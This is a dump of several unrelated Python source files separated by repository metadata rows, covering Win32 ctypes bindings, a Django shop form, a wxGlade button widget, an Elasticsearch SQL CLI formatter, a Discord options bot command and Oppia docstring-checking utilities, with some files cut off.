_kernel32.GetCurrentThreadId.argtypes = []
_kernel32.GetModuleHandleW.restype = HMODULE
_kernel32.GetModuleHandleW.argtypes = [c_wchar_p]
_kernel32.GlobalAlloc.restype = HGLOBAL
_kernel32.GlobalAlloc.argtypes = [UINT, c_size_t]
_kernel32.GlobalLock.restype = LPVOID
_kernel32.GlobalLock.argtypes = [HGLOBAL]
_kernel32.GlobalUnlock.restype = BOOL
_kernel32.GlobalUnlock.argtypes = [HGLOBAL]
_kernel32.SetLastError.restype = DWORD
_kernel32.SetLastError.argtypes = []
_kernel32.SetWaitableTimer.restype = BOOL
_kernel32.SetWaitableTimer.argtypes = [HANDLE, POINTER(LARGE_INTEGER), LONG, LPVOID, LPVOID, BOOL] # TIMERAPCPROC
_kernel32.WaitForSingleObject.restype = DWORD
_kernel32.WaitForSingleObject.argtypes = [HANDLE, DWORD]
_user32.AdjustWindowRectEx.restype = BOOL
_user32.AdjustWindowRectEx.argtypes = [LPRECT, DWORD, BOOL, DWORD]
_user32.ChangeDisplaySettingsExW.restype = LONG
_user32.ChangeDisplaySettingsExW.argtypes = [c_wchar_p, POINTER(DEVMODE), HWND, DWORD, LPVOID]
_user32.ClientToScreen.restype = BOOL
_user32.ClientToScreen.argtypes = [HWND, LPPOINT]
_user32.ClipCursor.restype = BOOL
_user32.ClipCursor.argtypes = [LPRECT]
_user32.CreateIconIndirect.restype = HICON
_user32.CreateIconIndirect.argtypes = [POINTER(ICONINFO)]
_user32.CreateWindowExW.restype = HWND
_user32.CreateWindowExW.argtypes = [DWORD, c_wchar_p, c_wchar_p, DWORD, c_int, c_int, c_int, c_int, HWND, HMENU, HINSTANCE, LPVOID]
_user32.DefWindowProcW.restype = LRESULT
_user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM]
_user32.DestroyWindow.restype = BOOL
_user32.DestroyWindow.argtypes = [HWND]
_user32.DispatchMessageW.restype = LRESULT
_user32.DispatchMessageW.argtypes = [LPMSG]
_user32.EnumDisplayMonitors.restype = BOOL
_user32.EnumDisplayMonitors.argtypes = [HDC, LPRECT, MONITORENUMPROC, LPARAM]
_user32.EnumDisplaySettingsW.restype = BOOL
_user32.EnumDisplaySettingsW.argtypes = [c_wchar_p, DWORD, POINTER(DEVMODE)]
_user32.FillRect.restype = c_int
_user32.FillRect.argtypes = [HDC, LPRECT, HBRUSH]
_user32.GetClientRect.restype = BOOL
_user32.GetClientRect.argtypes = [HWND, LPRECT]
_user32.GetCursorPos.restype = BOOL
_user32.GetCursorPos.argtypes = [LPPOINT]
# workaround for win 64-bit, see issue #664
_user32.GetDC.restype = c_void_p # HDC
_user32.GetDC.argtypes = [c_void_p] # [HWND]
_user32.GetDesktopWindow.restype = HWND
_user32.GetDesktopWindow.argtypes = []
_user32.GetKeyState.restype = c_short
_user32.GetKeyState.argtypes = [c_int]
_user32.GetMessageW.restype = BOOL
_user32.GetMessageW.argtypes = [LPMSG, HWND, UINT, UINT]
_user32.GetMonitorInfoW.restype = BOOL
_user32.GetMonitorInfoW.argtypes = [HMONITOR, POINTER(MONITORINFOEX)]
_user32.GetQueueStatus.restype = DWORD
_user32.GetQueueStatus.argtypes = [UINT]
_user32.GetSystemMetrics.restype = c_int
_user32.GetSystemMetrics.argtypes = [c_int]
_user32.LoadCursorW.restype = HCURSOR
_user32.LoadCursorW.argtypes = [HINSTANCE, c_wchar_p]
_user32.LoadIconW.restype = HICON
_user32.LoadIconW.argtypes = [HINSTANCE, c_wchar_p]
_user32.MapVirtualKeyW.restype = UINT
_user32.MapVirtualKeyW.argtypes = [UINT, UINT]
_user32.MapWindowPoints.restype = c_int
_user32.MapWindowPoints.argtypes = [HWND, HWND, c_void_p, UINT] # HWND, HWND, LPPOINT, UINT
_user32.MsgWaitForMultipleObjects.restype = DWORD
_user32.MsgWaitForMultipleObjects.argtypes = [DWORD, POINTER(HANDLE), BOOL, DWORD, DWORD]
_user32.PeekMessageW.restype = BOOL
_user32.PeekMessageW.argtypes = [LPMSG, HWND, UINT, UINT, UINT]
_user32.PostThreadMessageW.restype = BOOL
_user32.PostThreadMessageW.argtypes = [DWORD, UINT, WPARAM, LPARAM]
_user32.RegisterClassW.restype = ATOM
_user32.RegisterClassW.argtypes = [POINTER(WNDCLASS)]
_user32.RegisterHotKey.restype = BOOL
_user32.RegisterHotKey.argtypes = [HWND, c_int, UINT, UINT]
_user32.ReleaseCapture.restype = BOOL
_user32.ReleaseCapture.argtypes = []
# workaround for win 64-bit, see issue #664
_user32.ReleaseDC.restype = c_int32 # c_int
_user32.ReleaseDC.argtypes = [c_void_p, c_void_p] # [HWND, HDC]
_user32.ScreenToClient.restype = BOOL
_user32.ScreenToClient.argtypes = [HWND, LPPOINT]
_user32.SetCapture.restype = HWND
_user32.SetCapture.argtypes = [HWND]
_user32.SetClassLongW.restype = DWORD
_user32.SetClassLongW.argtypes = [HWND, c_int, LONG]
if IS64:
_user32.SetClassLongPtrW.restype = ULONG
_user32.SetClassLongPtrW.argtypes = [HWND, c_int, LONG_PTR]
else:
_user32.SetClassLongPtrW = _user32.SetClassLongW
_user32.SetCursor.restype = HCURSOR
_user32.SetCursor.argtypes = [HCURSOR]
_user32.SetCursorPos.restype = BOOL
_user32.SetCursorPos.argtypes = [c_int, c_int]
_user32.SetFocus.restype = HWND
_user32.SetFocus.argtypes = [HWND]
_user32.SetForegroundWindow.restype = BOOL
_user32.SetForegroundWindow.argtypes = [HWND]
_user32.SetTimer.restype = UINT_PTR
_user32.SetTimer.argtypes = [HWND, UINT_PTR, UINT, TIMERPROC]
_user32.SetWindowLongW.restype = LONG
_user32.SetWindowLongW.argtypes = [HWND, c_int, LONG]
_user32.SetWindowPos.restype = BOOL
_user32.SetWindowPos.argtypes = [HWND, HWND, c_int, c_int, c_int, c_int, UINT]
_user32.SetWindowTextW.restype = BOOL
_user32.SetWindowTextW.argtypes = [HWND, c_wchar_p]
_user32.ShowCursor.restype = c_int
_user32.ShowCursor.argtypes = [BOOL]
_user32.ShowWindow.restype = BOOL
_user32.ShowWindow.argtypes = [HWND, c_int]
_user32.TrackMouseEvent.restype = BOOL
_user32.TrackMouseEvent.argtypes = [POINTER(TRACKMOUSEEVENT)]
_user32.TranslateMessage.restype = BOOL
_user32.TranslateMessage.argtypes = [LPMSG]
_user32.UnregisterClassW.restype = BOOL
_user32.UnregisterClassW.argtypes = [c_wchar_p, HINSTANCE]
_user32.UnregisterHotKey.restype = BOOL
_user32.UnregisterHotKey.argtypes = [HWND, c_int]
# Raw inputs
_user32.RegisterRawInputDevices.restype = BOOL
_user32.RegisterRawInputDevices.argtypes = [PCRAWINPUTDEVICE, UINT, UINT]
_user32.GetRawInputData.restype = UINT
_user32.GetRawInputData.argtypes = [HRAWINPUT, UINT, LPVOID, PUINT, UINT]
#dwmapi
_dwmapi.DwmIsCompositionEnabled.restype = c_int
_dwmapi.DwmIsCompositionEnabled.argtypes = [POINTER(INT)]
_dwmapi.DwmFlush.restype = c_int
_dwmapi.DwmFlush.argtypes = [] | 42.967972 | 131 | 0.764618 |
acfb3d6414beb649815643e690ffc9e3f91790d6 | 147 | py | Python | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | import math
def areaofcircle(r) :
area = math.pi * r * r
print("Returning area to main program. ")
return(area)
radius =float(
| 18.375 | 46 | 0.612245 |
acfb3ecac9304995b670706d6f54097a16b77746 | 322 | py | Python | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | # coding=utf-8
import os
import sys
import unittest
dirname = os.path.dirname(os.path.abspath(__file__))
project = os.path.dirname(dirname)
if project not in sys.path:
sys.path.insert(0, project)
class BaseTestCase(unittest.TestCase):
@staticmethod
def main():
return unittest.main(failfast=True)
| 17.888889 | 52 | 0.723602 |
acfb3eeb927f6d2d30e8fb49d00183fc53de8770 | 1,272 | py | Python | src/transformers/commands/download.py | ari-holtzman/transformers | 8725c545e8feeecdcee0ad92ca1d80cee8f0c6e4 | [
"Apache-2.0"
] | 5,129 | 2019-09-30T11:21:03.000Z | 2022-03-31T22:35:12.000Z | src/transformers/commands/download.py | hmason/transformers | ab90353f1abfd15f8d21f99395658d060679a08c | [
"Apache-2.0"
] | 604 | 2019-10-05T00:39:46.000Z | 2022-03-31T11:12:07.000Z | src/transformers/commands/download.py | hmason/transformers | ab90353f1abfd15f8d21f99395658d060679a08c | [
"Apache-2.0"
] | 1,034 | 2019-09-30T15:01:32.000Z | 2022-03-31T06:14:50.000Z | from argparse import ArgumentParser
from transformers.commands import BaseTransformersCLICommand
def download_command_factory(args):
return DownloadCommand(args.model, args.cache_dir, args.force)
class DownloadCommand(BaseTransformersCLICommand):
@staticmethod
def register_subcommand(parser: ArgumentParser):
download_parser = parser.add_parser("download")
download_parser.add_argument(
"--cache-dir", type=str, default=None, help="Path to location to store the models"
)
download_parser.add_argument(
"--force", action="store_true", help="Force the model to be download even if already in cache-dir"
)
download_parser.add_argument("model", type=str, help="Name of the model to download")
download_parser.set_defaults(func=download_command_factory)
def __init__(self, model: str, cache: str, force: bool):
self._model = model
self._cache = cache
self._force = force
def run(self):
from transformers import AutoModel, AutoTokenizer
AutoModel.from_pretrained(self._model, cache_dir=self._cache, force_download=self._force)
AutoTokenizer.from_pretrained(self._model, cache_dir=self._cache, force_download=self._force)
| 38.545455 | 110 | 0.720126 |
acfb3f3555575b81f5d5c8f1dbe8497ad058d625 | 615 | py | Python | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | from django import forms
from pastry_shop.shop.models import Product, ProductCart
class ProductForm(forms.ModelForm):
amount = forms.IntegerField(min_value=1)
price = forms.DecimalField(min_value=0.01, max_digits=7, decimal_places=2)
class Meta:
model = Product
fields = "__all__"
widgets = {"categories": forms.CheckboxSelectMultiple}
class CartProductAddForm(forms.Form):
amount = forms.IntegerField(min_value=1)
class ShopProductAddForm(forms.Form):
product = forms.ModelChoiceField(queryset=Product.objects.all())
amount = forms.IntegerField(min_value=1)
| 26.73913 | 78 | 0.738211 |
acfb3fbd4fce83b48b3bec2d780d619d94ff63ca | 5,418 | py | Python | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | 1 | 2020-08-19T17:25:22.000Z | 2020-08-19T17:25:22.000Z | """
wxButton objects
@copyright: 2002-2007 Alberto Griggio
@copyright: 2014-2016 Carsten Grohmann
@copyright: 2016 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import wx
import config, common, compat
from edit_windows import ManagedBase, EditStylesMixin
from tree import Node
import new_properties as np
from .button_stockitems import *
from gui_mixins import BitmapMixin
class EditButton(ManagedBase, EditStylesMixin, BitmapMixin):
"Class to handle wxButton objects"
STOCKITEMS = sorted( ButtonStockItems.stock_ids.keys())
_PROPERTIES = ["Widget", "label", "stockitem",
"bitmap", "disabled_bitmap", "pressed_bitmap", "current_bitmap", "focus_bitmap",
"default", "style"]
PROPERTIES = ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES
_PROPERTY_HELP = {"default":"This sets the button to be the default item for the panel or dialog box.",
"stockitem":"Standard IDs for button identifiers"}
def __init__(self, name, parent, id, label, sizer, pos):
# Initialise parent classes
ManagedBase.__init__(self, name, 'wxButton', parent, id, sizer, pos)
EditStylesMixin.__init__(self)
BitmapMixin.__init__(self)
# initialise instance properties
self.label = np.TextProperty(label, default_value="", multiline="grow")
self.default = np.CheckBoxProperty(False, default_value=False)
self.stockitem = np.ComboBoxPropertyD(self.STOCKITEMS[0], choices=self.STOCKITEMS)
self.bitmap = np.BitmapPropertyD(min_version=(3,0))
self.disabled_bitmap = np.BitmapPropertyD(min_version=(3,0))
self.pressed_bitmap = np.BitmapPropertyD(min_version=(3,0))
self.current_bitmap = np.BitmapPropertyD(min_version=(3,0))
self.focus_bitmap = np.BitmapPropertyD(min_version=(3,0))
def create_widget(self):
stockitem_p = self.properties["stockitem"]
if stockitem_p.is_active():
label = ButtonStockItems.stock_ids[stockitem_p.get()]
else:
label = self.label
self.widget = wx.Button(self.parent.widget, self.id, label, style=self.style)
if compat.IS_PHOENIX:
self._set_preview_bitmaps()
def properties_changed(self, modified=None):
"update label (and size if label/stockitem have changed)"
label_modified = not modified or "label" in modified
if not modified or "stockitem" in modified:
# if stockitem is set, label needs to be deactivated and window id is wxID_...
if self.properties["stockitem"].is_active():
self.properties["label"].set_blocked(True)
new_id = "wxID_" + self.stockitem
self.properties["id"].set( new_id, deactivate=True )
#self.properties["id"].default_value = new_id # avoid this value to be written to XML
l = ButtonStockItems.stock_ids[self.stockitem]
if self.widget:
self.widget.SetLabel(l)
else:
self.properties["label"].set_blocked(False)
#self.properties["id"].default_value = "wxID_ANY"
label_modified = True
if label_modified and self.properties["label"].is_active():
if self.widget:
self.widget.SetLabel(self.label)
if label_modified or "name" in modified:
common.app_tree.refresh(self.node, refresh_label=True)
BitmapMixin._properties_changed(self, modified)
self._set_widget_best_size()
EditStylesMixin.properties_changed(self, modified)
ManagedBase.properties_changed(self, modified)
def builder(parent, sizer, pos, number=[1]):
"factory function for EditButton objects"
name = u'button_%d' % number[0]
while common.app_tree.has_name(name):
number[0] += 1
name = u'button_%d' % number[0]
with parent.frozen():
button = EditButton(name, parent, wx.NewId(), name, sizer, pos)
button.properties["style"].set_to_default()
button.check_defaults()
node = Node(button)
button.node = node
if parent.widget: button.create()
common.app_tree.insert(node, sizer.node, pos-1)
def xml_builder(attrs, parent, sizer, sizeritem, pos=None):
"factory to build EditButton objects from a XML file"
from xml_parse import XmlParsingError
try:
name = attrs['name']
except KeyError:
raise XmlParsingError(_("'name' attribute missing"))
if sizer is None or sizeritem is None:
raise XmlParsingError(_("sizer or sizeritem object cannot be None"))
button = EditButton(name, parent, wx.NewId(), '', sizer, pos)
#sizer.set_item(button.pos, proportion=sizeritem.proportion, span=sizeritem.span, flag=sizeritem.flag, border=sizeritem.border)
node = Node(button)
button.node = node
if pos is None:
common.app_tree.add(node, sizer.node)
else:
common.app_tree.insert(node, sizer.node, pos-1)
return button
def initialize():
"initialization function for the module: returns a wxBitmapButton to be added to the main palette"
common.widgets['EditButton'] = builder
common.widgets_from_xml['EditButton'] = xml_builder
return common.make_object_button('EditButton', 'button.xpm')
| 40.133333 | 131 | 0.665559 |
acfb401fe27b05b2b4cfcfcf221d80b566442b9c | 3,843 | py | Python | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 12 | 2020-05-14T19:01:55.000Z | 2021-01-23T21:00:07.000Z | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 62 | 2020-10-05T17:30:17.000Z | 2021-04-03T01:07:07.000Z | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 6 | 2020-05-09T22:12:52.000Z | 2020-11-16T10:03:56.000Z | """
Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at
http://www.apache.org/licenses/LICENSE-2.0
or in the "license" file accompanying this file. This file is distributed
on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the License for the specific language governing
permissions and limitations under the License.
"""
import click
import itertools
from cli_helpers.tabular_output import TabularOutputFormatter
from cli_helpers.tabular_output.preprocessors import format_numbers
click.disable_unicode_literals_warning = True
class Formatter:
"""Formatter instance is used to format the data retrieved from Elasticsearch."""
def __init__(self, settings):
"""A formatter can be customized by passing settings as a parameter."""
self.settings = settings
self.table_format = "vertical" if self.settings.is_vertical else self.settings.table_format
self.max_width = self.settings.max_width
def format_array(val):
if val is None:
return self.settings.missingval
if not isinstance(val, list):
return val
return "[" + ",".join(str(format_array(e)) for e in val) + "]"
def format_arrays(field_data, headers, **_):
field_data = list(field_data)
for row in field_data:
row[:] = [format_array(val) if isinstance(val, list) else val for val in row]
return field_data, headers
self.output_kwargs = {
"sep_title": "RECORD {n}",
"sep_character": "-",
"sep_length": (1, 25),
"missing_value": self.settings.missingval,
"preprocessors": (format_numbers, format_arrays),
"disable_numparse": True,
"preserve_whitespace": True,
"style": self.settings.style_output,
}
def format_output(self, data):
"""Format data.
:param data: raw data get from ES
:return: formatted output, it's either table or vertical format
"""
formatter = TabularOutputFormatter(format_name=self.table_format)
# parse response data
datarows = data["datarows"]
schema = data["schema"]
total_hits = data["total"]
cur_size = data["size"]
# unused data for now,
fields = []
types = []
# get header and type as lists, for future usage
for i in schema:
fields.append(i["name"])
types.append(i["type"])
output = formatter.format_output(datarows, fields, **self.output_kwargs)
output_message = "fetched rows / total rows = %d/%d" % (cur_size, total_hits)
# Open Distro for ES sql has a restriction of retrieving 200 rows of data by default
if total_hits > 200 == cur_size:
output_message += "\n" + "Attention: Use LIMIT keyword when retrieving more than 200 rows of data"
# check width overflow, change format_name for better visual effect
first_line = next(output)
output = itertools.chain([output_message], [first_line], output)
if len(first_line) > self.max_width:
click.secho(message="Output longer than terminal width", fg="red")
if click.confirm("Do you want to display data vertically for better visual effect?"):
output = formatter.format_output(datarows, fields, format_name="vertical", **self.output_kwargs)
output = itertools.chain([output_message], output)
# TODO: if decided to add row_limit. Refer to pgcli -> main -> line 866.
return output
| 38.43 | 112 | 0.64611 |
acfb4109f206ba41df71b1c919f58c2f14e16a12 | 3,070 | py | Python | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | 1 | 2021-12-31T04:10:42.000Z | 2021-12-31T04:10:42.000Z | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | null | null | null | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | null | null | null | import os
import discord
import matplotlib.pyplot as plt
import discordbot.config_discordbot as cfg
from gamestonk_terminal import config_plot as cfp
from gamestonk_terminal.helper_funcs import plot_autoscale
from gamestonk_terminal.stocks.options import yfinance_model
async def vol_command(
ctx,
ticker: str = None,
expiry: str = "",
min_sp: float = None,
max_sp: float = None,
):
"""Options VOL"""
try:
# Debug
if cfg.DEBUG:
print(f"!stocks.opt.vol {ticker} {expiry} {min_sp} {max_sp}")
# Check for argument
if ticker is None:
raise Exception("Stock ticker is required")
dates = yfinance_model.option_expirations(ticker)
if not dates:
raise Exception("Stock ticker is invalid")
options = yfinance_model.get_option_chain(ticker, expiry)
current_price = yfinance_model.get_price(ticker)
if min_sp is None:
min_strike = 0.75 * current_price
else:
min_strike = min_sp
if max_sp is None:
max_strike = 1.90 * current_price
else:
max_strike = max_sp
calls = options.calls
puts = options.puts
call_v = calls.set_index("strike")["volume"] / 1000
put_v = puts.set_index("strike")["volume"] / 1000
plt.style.use("seaborn")
fig, ax = plt.subplots(figsize=plot_autoscale(), dpi=cfp.PLOT_DPI)
put_v.plot(
x="strike",
y="volume",
label="Puts",
ax=ax,
marker="o",
ls="-",
c="r",
)
call_v.plot(
x="strike",
y="volume",
label="Calls",
ax=ax,
marker="o",
ls="-",
c="g",
)
ax.axvline(
current_price, lw=2, c="k", ls="--", label="Current Price", alpha=0.7
)
ax.grid("on")
ax.set_xlabel("Strike Price")
ax.set_ylabel("Volume (1k) ")
ax.set_xlim(min_strike, max_strike)
ax.set_title(f"Volume for {ticker.upper()} expiring {expiry}")
plt.legend(loc=0)
fig.tight_layout(pad=1)
imagefile = "opt_vol.png"
plt.savefig("opt_vol.png")
image = discord.File(imagefile)
if cfg.DEBUG:
print(f"Image: {imagefile}")
title = " " + ticker.upper() + " Options: Volume"
embed = discord.Embed(title=title, colour=cfg.COLOR)
embed.set_image(url="attachment://opt_vol.png")
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
os.remove("opt_vol.png")
await ctx.send(embed=embed, file=image)
except Exception as e:
embed = discord.Embed(
title="ERROR Options: Volume",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
| 26.929825 | 81 | 0.55342 |
acfb416aae0fb7f8b804942f1a8cb4c7b6facb07 | 10,500 | py | Python | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility methods for docstring checking."""
import ast
import os
import re
import sys
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PYLINT_PATH = os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-1.8.4')
sys.path.insert(0, _PYLINT_PATH)
# pylint: disable=wrong-import-position
import astroid # isort:skip
from pylint.checkers import utils # isort:skip
from pylint.extensions import _check_docs_utils # isort:skip
# pylint: enable=wrong-import-position
def space_indentation(s):
"""The number of leading spaces in a string
Args:
s: str. The input string.
Returns:
int. The number of leading spaces.
"""
return len(s) - len(s.lstrip(' '))
def get_setters_property_name(node):
"""Get the name of the property that the given node is a setter for.
Args:
node: str. The node to get the property name for.
Returns:
str|None. The name of the property that the node is a setter for,
or None if one could not be found.
"""
decorator_nodes = node.decorators.nodes if node.decorators else []
for decorator_node in decorator_nodes:
if (isinstance(decorator_node, astroid.Attribute) and
decorator_node.attrname == 'setter' and
isinstance(decorator_node.expr, astroid.Name)):
return decorator_node.expr.name
return None
def get_setters_property(node):
"""Get the property node for the given setter node.
Args:
node: astroid.FunctionDef. The node to get the property for.
Returns:
astroid.FunctionDef|None. The node relating to the property of
the given setter node, or None if one could not be found.
"""
property_ = None
property_name = get_setters_property_name(node)
class_node = utils.node_frame_class(node)
if property_name and class_node:
class_attrs = class_node.getattr(node.name)
for attr in class_attrs:
if utils.decorated_with_property(attr):
property_ = attr
break
return property_
def returns_something(return_node):
"""Check if a return node returns a value other than None.
Args:
return_node: astroid.Return. The return node to check.
Returns:
bool. True if the return node returns a value
other than None, False otherwise.
"""
returns = return_node.value
if returns is None:
return False
return not (isinstance(returns, astroid.Const) and returns.value is None)
def possible_exc_types(node):
"""Gets all of the possible raised exception types for the given raise node.
Caught exception types are ignored.
Args:
node: astroid.node_classes.NodeNG. The raise
to find exception types for.
Returns:
set(str). A list of exception types.
"""
excs = []
if isinstance(node.exc, astroid.Name):
inferred = utils.safe_infer(node.exc)
if inferred:
excs = [inferred.name]
elif (isinstance(node.exc, astroid.Call) and
isinstance(node.exc.func, astroid.Name)):
target = utils.safe_infer(node.exc.func)
if isinstance(target, astroid.ClassDef):
excs = [target.name]
elif isinstance(target, astroid.FunctionDef):
for ret in target.nodes_of_class(astroid.Return):
if ret.frame() != target:
continue
val = utils.safe_infer(ret.value)
if (val and isinstance(val, (
astroid.Instance, astroid.ClassDef)) and
utils.inherit_from_std_ex(val)):
excs.append(val.name)
elif node.exc is None:
handler = node.parent
while handler and not isinstance(handler, astroid.ExceptHandler):
handler = handler.parent
if handler and handler.type:
inferred_excs = astroid.unpack_infer(handler.type)
excs = (exc.name for exc in inferred_excs
if exc is not astroid.Uninferable)
try:
return set(
exc for exc in excs if not utils.node_ignores_exception(
node, exc))
except astroid.InferenceError:
return set()
def docstringify(docstring):
"""Converts a docstring in its str form to its Docstring object
as defined in the pylint library.
Args:
docstring: str. Docstring for a particular class or function.
Returns:
Docstring. Pylint Docstring class instance representing
a node's docstring.
"""
for docstring_type in [GoogleDocstring]:
instance = docstring_type(docstring)
if instance.is_valid():
return instance
return _check_docs_utils.Docstring(docstring)
class GoogleDocstring(_check_docs_utils.GoogleDocstring):
"""Class for checking whether docstrings follow the Google Python Style
Guide.
"""
re_multiple_type = _check_docs_utils.GoogleDocstring.re_multiple_type
re_param_line = re.compile(r"""
\s* \*{{0,2}}(\w+) # identifier potentially with asterisks
\s* ( [:]
\s*
({type}|\S*)
(?:,\s+optional)?
[.] )? \s* # optional type declaration
\s* (.*) # beginning of optional description
""".format(
type=re_multiple_type,
), flags=re.X | re.S | re.M)
re_returns_line = re.compile(r"""
\s* (({type}|\S*).)? # identifier
\s* (.*) # beginning of description
""".format(
type=re_multiple_type,
), flags=re.X | re.S | re.M)
re_yields_line = re_returns_line
class ASTDocStringChecker(object):
"""Checks that docstrings meet the code style."""
def __init__(self):
pass
@classmethod
def get_args_list_from_function_definition(cls, function_node):
"""Extracts the arguments from a function definition.
Ignores class specific arguments (self and cls).
Args:
function_node: ast.FunctionDef. Represents a function.
Returns:
list(str). The args for a function as listed in the function
definition.
"""
# Ignore self and cls args.
args_to_ignore = ['self', 'cls']
return [a.id for a in function_node.args.args if a.id not in
args_to_ignore]
@classmethod
def build_regex_from_args(cls, function_args):
"""Builds a regex string from a function's arguments to match against
the docstring. Ensures the docstring contains an 'Args' header, and
each of the arguments are listed, followed by a colon, separated by new
lines, and are listed in the correct order.
Args:
function_args: list(str). The arguments for a function.
Returns:
str. A regex that checks for an "Arg" header and then each arg term
with a colon in order with any characters in between.
The resulting regex looks like this (the backslashes are escaped):
(Args:)[\\S\\s]*(arg_name0:)[\\S\\s]*(arg_name1:)
If passed an empty list, returns None.
"""
if len(function_args) > 0:
formatted_args = ['({}:)'.format(arg) for arg in function_args]
return r'(Args:)[\S\s]*' + r'[\S\s]*'.join(formatted_args)
@classmethod
def compare_arg_order(cls, func_def_args, docstring):
"""Compares the arguments listed in the function definition and
docstring, and raises errors if there are missing or mis-ordered
arguments in the docstring.
Args:
func_def_args: list(str). The args as listed in the function
definition.
docstring: str. The contents of the docstring under the Args
header.
Returns:
list(str). Each str contains an error message. If no linting
errors were found, the list will be empty.
"""
results = []
# If there is no docstring or it doesn't have an Args section, exit
# without errors.
if docstring is None or 'Args' not in docstring:
return results
# First check that each arg is in the docstring.
for arg_name in func_def_args:
arg_name_colon = arg_name + ':'
if arg_name_colon not in docstring:
if arg_name not in docstring:
results.append('Arg missing from docstring: {}'.format(
arg_name))
else:
results.append('Arg not followed by colon: {}'.format(
arg_name))
# Only check ordering if there's more than one argument in the
# function definition, and no other errors have been found.
if len(func_def_args) > 0 and len(results) == 0:
regex_pattern = cls.build_regex_from_args(func_def_args)
regex_result = re.search(regex_pattern, docstring)
if regex_result is None:
results.append('Arg ordering error in docstring.')
return results
@classmethod
def check_docstrings_arg_order(cls, function_node):
"""Extracts the arguments from a function definition.
Args:
function_node: ast node object. Represents a function.
Returns:
func_result: list(str). List of docstring errors associated with
the function. If the function has no errors, the list is empty.
"""
func_def_args = cls.get_args_list_from_function_definition(
function_node)
docstring = ast.get_docstring(function_node)
func_result = cls.compare_arg_order(func_def_args, docstring)
return func_result
| 34.313725 | 80 | 0.626571 |
acfb41d344fb5bcc68ad5555fa52080e1e7e7358 | 108 | py | Python | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null |
from tf_al.wrapper import Model
class SparseGaussianProcess(Model):
